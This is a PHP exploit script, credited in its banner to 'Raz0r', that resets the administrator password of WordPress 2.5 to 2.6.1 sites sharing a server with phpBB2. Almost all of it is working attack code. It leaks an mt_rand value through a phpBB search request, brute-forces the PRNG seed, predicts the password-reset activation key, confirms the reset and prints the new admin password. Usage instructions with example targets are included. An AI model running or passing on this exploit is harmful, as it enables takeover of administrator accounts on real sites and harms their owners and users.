<?php echo "------------------------------------------------------------------\n"; echo "Wordpress 2.5 <= 2.6.1 through phpBB2 Reset Admin Password Exploit\n"; echo "(c)oded by Raz0r (http://Raz0r.name/)\n"; echo "------------------------------------------------------------------\n"; if ($_SERVER['argc']<3) { echo "USAGE:\n"; echo "~~~~~~\n"; echo "php {$_SERVER['argv'][0]} [wp] [phpbb] OPTIONS\n\n"; echo "[wp] - target server where Wordpress is installed\n"; echo "[phpbb] - path to phpBB (must be located on the same server)\n\n"; echo "OPTIONS:\n"; echo "--wp_user=[value] (default: admin)\n"; echo "--search=[value] (default: `site OR file`)\n"; echo "--skipcheck (force exploit not to compare PHP versions)\n"; echo "examples:\n"; echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://site.com/forum/\n"; echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://samevhost.com/forum/ --wp_user=lol\n"; die; } set_time_limit(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",10); $wp = $_SERVER['argv'][1]; $phpbb = $_SERVER['argv'][2]; for($i=3;$i<$_SERVER['argc'];$i++){ if(strpos($_SERVER['argv'][$i],"--wp_user=")!==false) { list(,$wp_user) = explode("=",$_SERVER['argv'][$i]); } if (strpos($_SERVER['argv'][$i],"--search=")!==false) { list(,$search) = explode("=",$_SERVER['argv'][$i]); } if (strpos($_SERVER['argv'][$i],"--skipcheck")!==false) { $skipcheck=true; } } if(!isset($wp_user))$wp_user='admin'; if(!isset($search))$search='site OR file'; $wp_parts = @parse_url($wp); $phpbb_parts = @parse_url($phpbb); if(isset($wp_parts['host']))$wp_ip = gethostbyname($wp_parts['host']);else die("[-] Wrong parameter given\n"); if(isset($phpbb_parts['host']))$phpbb_ip = gethostbyname($phpbb_parts['host']);else die("[-] Wrong parameter given\n"); if($wp_ip!=$phpbb_ip) die("[-] Web apps must be located on the same server\n"); $phpbb_host = $phpbb_parts['host']; if(isset($phpbb_parts['port']))$phpbb_port=$phpbb_parts['port']; else $phpbb_port=80; if(isset($phpbb_parts['path']))$phpbb_path=$phpbb_parts['path']; else $phpbb_path="/"; if(substr($phpbb_path,-1,1)!="/")$phpbb_path .= "/"; $wp_host = $wp_parts['host']; if(isset($wp_parts['port']))$wp_port=$wp_parts['port']; else $wp_port=80; if(isset($wp_parts['path']))$wp_path=$wp_parts['path']; else $wp_path="/"; if(substr($wp_path,-1,1)!="/")$wp_path .= "/"; echo "[~] Connecting... "; $sock = fsockopen($phpbb_ip,$phpbb_port); if(!$sock)die("failed\n"); else echo "OK\n"; $packet = "GET {$wp_path}wp-login.php HTTP/1.0\r\n"; $packet.= "Host: {$wp_host}\r\n"; $packet.= "Connection: close\r\n\r\n"; $resp=''; fputs($sock,$packet); while(!feof($sock)) { $resp.=fgets($sock); } fclose($sock); if(preg_match('@HTTP/1\.(0|1) 200 OK@i',$resp)){ if(preg_match('@login\.css\?ver=([\d\.]+)\'@',$resp)) $wp26=true; else $wp26=false; } else die("[-] Can't obtain wp-login.php\n"); if(!isset($skipcheck)) { echo "[~] Comparing PHP versions... "; $out=array(); preg_match('@x-powered-by: *PHP/([\d\.]+)@i',$resp,$out); if(!isset($out[1]))die( "failed\n[-] Can't get PHP version\n"); else { if(!(version_compare($out[1],'5.2.6') && version_compare(phpversion(),'5.2.6')) && !(!version_compare($out[1],'5.2.6') && !version_compare(phpversion(),'5.2.6')) ) { die("failed\n[-] Server's and local PHP versions are unacceptable\n"); } } echo "OK\n"; } $ock = fsockopen($phpbb_ip,$phpbb_port); echo "[~] Sending request to $phpbb\n"; $data = "search_keywords=".urlencode($search)."&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200"; $packet = "POST {$phpbb_path}search.php?mode=results HTTP/1.1\r\n"; $packet.= "Host: {$phpbb_host}\r\n"; $packet.= "Connection: keep-alive\r\n"; $packet.= "Keep-alive: 300\r\n"; $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet.= "Content-Length: ".strlen($data)."\r\n\r\n"; $packet.= $data; fputs($ock, $packet); sleep(5); $resp=''; while(!feof($ock)) { $resp = fgets($ock); preg_match('@search.php\?search_id=(\d+)&@',$resp,$search); if(isset($search[1])) { $search_id = (int)$search[1]; echo "[+] search_id is $search_id\n"; break; } } if(!isset($search_id)) die("[-] search_id Not Found, try the other --search param\n"); echo "[~] Sending request to $wp\n"; $data = "user_login=".urlencode($wp_user)."&wp-submit=Get+New+Password"; $packet = "POST {$wp_path}wp-login.php?action=lostpassword HTTP/1.1\r\n"; $packet.= "Host: {$wp_host}\r\n"; $packet.= "Connection: keep-alive\r\n"; $packet.= "Keep-alive: 300\r\n"; $packet.= "Referer: {$wp}/wp-login.php?action=lostpassword\r\n"; $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet.= "Content-Length: ".strlen($data)."\r\n\r\n"; $packet.= $data; fputs($ock,$packet); $seed = search_seed($search_id); if($seed!==false) echo "[+] Seed is $seed\n"; else die("[-] Seed Not Found\n"); mt_srand($seed); mt_rand(); if($wp26) $key = wp26_generate_password(20, false); else $key = wp_generate_password(); echo "[+] Activation key should be $key\ "; echo "[~] Sending request to activate password reset\n"; $packet = "GET {$wp_path}wp-login.php?action=rp&key={$key} HTTP/1.1\r\n"; $packet.= "Host: {$wp_host}\r\n"; $packet.= "Connection: close\r\n\r\n"; fputs($ock,$packet); while(!feof($ock)) { $resp .= fgets($ock); } if(preg_match('/(Invalid username or e-mail)|(пользователь отсутствует в базе данных)|(Неправильное имя пользователя)/i',$resp)) die("[-] Incorrect username for wordpress\n"); if(strpos($resp,'error=invalidkey')!==false) die("[-] Activation key is incorrect\n"); if($wp26) $pass = wp26_generate_password(); else $pass = wp_generate_password(); echo "[+] New password should be $pass\n"; function search_seed($rand_num) { $max = 1000000; for($seed=0;$seed<=$max;$seed++){ mt_srand($seed); $key = mt_rand(); if($key==$rand_num) return $seed; } return false; } function wp26_generate_password($length = 12, $special_chars = true) { $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; if ( $special_chars ) $chars .= '!@#$%^&*()'; $password = ''; for ( $i = 0; $i < $length; $i++ ) $password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1); return $password; } function wp_generate_password() { $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; $length = 7; $password = ''; for ( $i = 0; $i < $length; $i++ ) $password .= substr($chars, mt_rand(0, 61), 1); return $password; } ?>